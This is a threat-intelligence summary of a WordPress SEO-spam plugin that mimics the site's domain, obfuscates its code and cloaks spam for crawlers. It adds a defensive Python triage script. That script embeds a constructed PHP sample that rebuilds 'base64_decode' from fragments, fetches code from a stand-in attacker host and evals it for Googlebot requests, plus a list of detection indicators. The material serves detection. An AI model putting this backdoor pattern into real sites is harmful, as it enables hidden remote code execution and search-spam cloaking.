
Fake Spam Plugin Uses Victim's Domain Name to Evade Detection

NetmanageIT OpenCTI - opencti.netmanageit.com


SUMMARY :

An SEO spam infection was found hiding in a WordPress plugin whose name mimics the infected site's own domain, so the plugin blends in with legitimate, site-specific code instead of standing out as a foreign package. The malware injects spam content aimed at manipulating search-engine rankings and activates only under specific conditions, such as when the request appears to come from a search-engine crawler. Its code is heavily obfuscated: the payload is split across thousands of tiny variable assignments that are reassembled at runtime. Once decoded, the code downloads files from external hosts, fetches remote content, and serves tailored spam to search engines while ordinary visitors see a normal page (cloaking). The attacker's domain, mag1cw0rld[.]com, serves as the remote-control endpoint. Because the plugin name looks site-specific and the spam is shown only to crawlers, the infection can persist unnoticed for long periods and is difficult to catch with traditional scanners.
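The three traits above (a plugin slug that mimics the site's own domain, source built from many tiny string-fragment assignments, and a code path gated on the crawler User-Agent) can each be checked mechanically. The following triage script is an added example written for this page; it is not the malware's code and not a tool from the original report. The sample plugin source, the site URL, the `attacker.invalid` host and the scoring thresholds are all constructed assumptions for illustration. The fragment-folding step shows why scanning the raw file for `base64_decode` or `Googlebot` finds nothing: those strings only exist after the fragments are joined.

```python
"""Heuristic triage of a WordPress plugin for the evasion traits described
in the report: domain-mimicking slug, fragmented string assignments, and
crawler-gated execution. Example code added to this page, not the malware."""
import re
from urllib.parse import urlparse

# Constructed sample (an assumption for illustration, NOT the real plugin):
# a few fragment assignments reassembled into base64_decode / Googlebot.
SAMPLE_PLUGIN_SOURCE = r"""<?php
/*
Plugin Name: example-shop.com
*/
$a1 = 'ba'; $a2 = 'se'; $a3 = '64'; $a4 = '_de'; $a5 = 'co'; $a6 = 'de';
$f = $a1 . $a2 . $a3 . $a4 . $a5 . $a6;
$u1 = 'Go'; $u2 = 'ogle'; $u3 = 'bot';
$remote = file_get_contents('http://attacker.invalid/p.txt');
if (strpos($_SERVER['HTTP_USER_AGENT'], $u1 . $u2 . $u3) !== false) {
    eval($f($remote));
}
"""

# $name = 'literal';  (single-quoted literals without escapes, enough here)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^'\\]*)'\s*;")
# $a . $b . $c  chains of variables joined with the PHP concat operator
CONCAT_RE = re.compile(r"\$\w+(?:\s*\.\s*\$\w+)+")
# Tokens worth flagging once the fragments have been folded back together.
INDICATORS = ("base64_decode", "eval", "HTTP_USER_AGENT", "Googleb" + "ot",
              "bingbot", "file_get_contents", "curl_exec")


def _norm(s: str) -> str:
    """Lowercase and strip everything but letters/digits for loose comparison."""
    return re.sub(r"[^a-z0-9]", "", s.lower())


def plugin_mimics_domain(plugin_slug: str, site_url: str) -> bool:
    """True if the plugin slug equals the site's host (or its first label)."""
    host = (urlparse(site_url).hostname or site_url).lower()
    if host.startswith("www."):
        host = host[4:]
    first_label = host.split(".")[0]
    slug = _norm(plugin_slug)
    return slug == _norm(host) or (len(first_label) >= 4 and slug == _norm(first_label))


def fragment_assignment_stats(source: str, max_len: int = 4):
    """Return (total string assignments, assignments whose literal is <= max_len)."""
    assigns = ASSIGN_RE.findall(source)
    short = sum(1 for _, lit in assigns if len(lit) <= max_len)
    return len(assigns), short


def fold_concatenations(source: str) -> str:
    """Replace chains of fragment variables with the literal they build."""
    frags = dict(ASSIGN_RE.findall(source))

    def join(m: re.Match) -> str:
        names = re.findall(r"\$(\w+)", m.group(0))
        if all(n in frags for n in names):
            return "'" + "".join(frags[n] for n in names) + "'"
        return m.group(0)  # chain uses a non-literal variable; leave it

    return CONCAT_RE.sub(join, source)


def decode_and_scan(source: str):
    """Fold fragments, then list which indicator strings appear."""
    folded = fold_concatenations(source)
    return folded, sorted(i for i in INDICATORS if i in folded)


def triage_plugin(plugin_slug: str, site_url: str, source: str):
    """Collect human-readable findings; thresholds are assumptions."""
    findings = []
    if plugin_mimics_domain(plugin_slug, site_url):
        findings.append("plugin slug mimics the site's own domain")
    total, short = fragment_assignment_stats(source)
    if total >= 5 and short / total >= 0.8:
        findings.append(f"{short}/{total} string assignments are tiny fragments")
    _, hits = decode_and_scan(source)
    if "HTTP_USER_AGENT" in hits and any(h.lower().endswith("bot") for h in hits):
        findings.append("execution gated on a crawler User-Agent (cloaking)")
    if {"eval", "base64_decode"} & set(hits) and \
            {"file_get_contents", "curl_exec"} & set(hits):
        findings.append("fetches remote content and evals it")
    return findings


if __name__ == "__main__":
    for f in triage_plugin("example-shop.com", "https://www.example-shop.com",
                           SAMPLE_PLUGIN_SOURCE):
        print("-", f)
```

In practice you would run `triage_plugin` over every `.php` file under each `wp-content/plugins/<slug>/` directory, taking the site URL from `wp option get siteurl`. The folding step is deliberately simple (single-quoted literals, plain `.` chains); the real sample used thousands of fragments, so expect to raise `max_len` and the assignment-count threshold, and to treat any plugin whose slug matches the domain as suspicious regardless of score.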

OPENCTI LABELS :

obfuscation,wordpress,remote control,evasion techniques,search engine manipulation,code injection,stealth malware,seo spam,plugin disguise

